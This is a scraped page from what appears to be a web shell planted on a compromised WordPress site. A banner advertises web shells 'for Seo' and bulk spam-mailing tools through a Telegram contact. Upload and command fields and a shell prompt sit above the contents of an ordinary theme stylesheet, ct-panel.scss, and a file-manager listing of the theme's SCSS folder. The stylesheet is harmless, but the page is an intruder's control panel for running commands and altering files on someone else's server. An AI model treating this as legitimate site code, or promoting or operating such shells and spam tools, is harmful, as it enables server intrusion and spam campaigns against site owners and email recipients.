__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
.ct-panel {
	&.ct-click-allowed {
		cursor: pointer;
		position: relative;

		&:before {
			position: absolute;
			content: '';
			top: -11px;
			inset-inline-start: -12px;
			width: calc(100% + 24px);
			height: 42px;
		}

		&:hover {
			&:before {
				background: rgba(255, 255, 255, 0.7);
			}
		}

		header > label {
			cursor: pointer;
		}

		.ct-customizer-panel-option {
			button {
				opacity: 0.7;
				pointer-events: auto;
				transform: translate3d(0, 0, 0);
				transition: opacity 0.2s ease 0.2s, transform 0.2s ease 0.2s;
			}
		}
	}

	&[data-panel='only-arrow'] {
		.ct-customizer-panel-option button {
			inset-inline-end: -10px;
		}
	}
}

// option
.ct-customizer-panel-option {
	position: relative;
	cursor: pointer;
	min-height: 20px;

	button {
		position: absolute;
		display: flex;
		align-items: center;
		justify-content: center;
		width: 25px;
		height: 20px;
		top: calc(50% - 10px);
		inset-inline-end: -24px;
		padding: 0;
		cursor: pointer;
		border: none;
		opacity: 0;
		pointer-events: none;
		background: transparent;

		&:after {
			font-family: dashicons;
			content: '\f345';
			width: 12px;
			height: 12px;
			font-size: 12px;
			color: inherit;
			-webkit-font-smoothing: antialiased;
			-moz-osx-font-smoothing: grayscale;
		}

		&:focus {
			outline: none;
		}
	}

	.ct-option-switch + button {
		transform: translate3d(-7px, 0, 0);
		transition: opacity 0s ease 0s, transform 0s ease 0s;
	}
}

// panel
.ct-customizer-panel {
	position: absolute;
	overflow-x: hidden;
	overflow-y: auto;
	z-index: 99;
	background: #f0f0f1;
	inset: 0;
	border-top: 1px solid #ddd;
	border-bottom: 1px solid #ddd;

	> * {
		position: absolute;
		inset: 0;
	}

	> *:nth-child(2) {
		display: none;
	}

	&.ct-panel-second-level {
		width: 200%;

		> * {
			width: 50%;
		}

		> *:last-child {
			inset-inline-start: 50%;
			display: block;
		}
	}
}

.ct-panel-open {
	height: 100% !important;
	overflow-y: hidden !important;
	transform: translateX(-100%) !important;
}

// panel actions
.wp-core-ui {
	.customize-panel-back:focus,
	.customize-panel-back:hover,
	.customize-section-back:focus,
	.customize-section-back:hover {
		color: var(--ui-accent-color);
	}
}

.customize-panel-actions {
	display: flex;
	background: #fff;
	border-bottom: 1px solid #ddd;

	button {
		width: 48px;
		padding-inline-end: 24px;
		background: #fff;
		cursor: pointer;
		border: none;
		border-inline-end: 1px solid #ddd;
		border-inline-start: 4px solid #fff;

		&:before {
			font: normal 20px/48px dashicons;
			content: '\f341';
			position: relative;
			inset-inline-start: 9px;
		}

		&:focus {
			outline: none;
		}
	}

	h3 {
		font-size: 20px !important;
		font-weight: 200;
		line-height: 26px;
		display: block;
		overflow: hidden;
		white-space: nowrap;
		text-overflow: ellipsis;
		color: #555d66;
		width: 100%;
		margin: 0;
		padding: 10px;
		padding-inline-start: 14px;

		span {
			font-size: 13px;
			display: block;
			font-weight: 400;
			overflow: hidden;
		}
	}
}

// panel content
.customizer-panel-content {
	margin: 0;
	padding: 0 12px 30px 12px;

	> li {
		&:first-child {
			margin-top: 30px;

			&.customize-control-ct-title {
				margin-top: 0;
				border-top: none !important;
			}
		}
	}

	> form {
		margin-inline: -12px;
	}
}

.ct-tmp-panel-actions {
	z-index: 999999;
	position: relative;
}

// temp notice for this case - https://themes.trac.wordpress.org/ticket/181031#comment:13
// to remove later maybe
.ct-customizer-panel-container {
	display: flex;
	align-items: center;

	.ct-option-notice {
		display: flex;
		justify-content: center;
		margin-inline-end: 10px;
		position: initial;
	}

	[data-tooltip-reveal='top:full'] {
		.ct-tooltip {
			text-align: initial;
			white-space: initial;
			padding: 8px 10px;
			top: 0;
			inset-inline: 0px;
			transform: translateY(calc(-100% - 8px));
		}

		.ct-tooltip-trigger {
			position: relative;
			display: flex;
			align-items: center;
			justify-content: center;

			&:after {
				opacity: 0;
				visibility: hidden;
				content: '';
				position: absolute;
				box-sizing: border-box;
				width: 10px;
				height: 5px;
				border-inline: 5px solid transparent;
				border-top: 5px solid rgba(54, 63, 66, 1);

				transform: translateY(calc(-100% - 11px));

				transition: opacity 0.2s cubic-bezier(0.455, 0.03, 0.515, 0.955),
					transform 0.2s cubic-bezier(0.455, 0.03, 0.515, 0.955),
					visibility 0.2s cubic-bezier(0.455, 0.03, 0.515, 0.955);
			}
		}

		&:hover {
			.ct-tooltip-trigger:after {
				opacity: 1;
				visibility: visible;
				transform: translateY(calc(-100% - 15px));
			}

			.ct-tooltip {
				transform: translateY(calc(-100% - 12px));
			}
		}
	}
}

Filemanager

Name Type Size Permission Actions
background Folder 0750
color Folder 0750
modal Folder 0750
animated-checkbox.scss File 1.82 KB 0640
attachment.scss File 1017 B 0640
border.scss File 606 B 0640
box-shadow.scss File 1.92 KB 0640
buttons-group.scss File 2.42 KB 0640
checkbox.scss File 1.03 KB 0640
ct-inner-layers.scss File 163 B 0640
ct-layers.scss File 2.67 KB 0640
ct-panel.scss File 4.56 KB 0640
ct-select.scss File 3.05 KB 0640
date-picker.scss File 1.28 KB 0640
devices.scss File 693 B 0640
file-uploader.scss File 49 B 0640
general.scss File 4.88 KB 0640
icon-picker.scss File 2.52 KB 0640
image-picker.scss File 1.89 KB 0640
image-position.scss File 198 B 0640
input.scss File 1.09 KB 0640
labeled-group.scss File 249 B 0640
main.scss File 1.79 KB 0640
modal-tabs.scss File 785 B 0640
more-options-trigger.scss File 1.02 KB 0640
notification.scss File 547 B 0640
number.scss File 1.32 KB 0640
option-modal.scss File 1.09 KB 0640
option-state.scss File 144 B 0640
options-group.scss File 815 B 0640
options-inherit-state.scss File 616 B 0640
options-rtl.scss File 728 B 0640
options-type-gutenberg.scss File 2.43 KB 0640
radio.scss File 1.85 KB 0640
ratio-picker.scss File 3.43 KB 0640
responsive-controls.scss File 321 B 0640
revert.scss File 1.28 KB 0640
root-styles.scss File 67 B 0640
slider.scss File 2.41 KB 0640
spacing.scss File 1.17 KB 0640
switch.scss File 782 B 0640
tabs.scss File 2.23 KB 0640
taxonomies-options.scss File 207 B 0640
textarea.scss File 507 B 0640
thumbnail-actions.scss File 2.61 KB 0640
time-picker.scss File 183 B 0640
tools-panel-component.scss File 481 B 0640
tooltip.scss File 2.24 KB 0640
typography.scss File 9.15 KB 0640
upload-button.scss File 372 B 0640
value-changer.scss File 3.48 KB 0640
visibility.scss File 27 B 0640
widgets-areas-screen.scss File 740 B 0640
widgets-block-area.scss File 820 B 0640
widgets-common.scss File 1.03 KB 0640
woo-accordion.scss File 1.16 KB 0640
woo-image-variations.scss File 372 B 0640
woo-numbers.scss File 187 B 0640
wp-editor.scss File 379 B 0640
Filemanager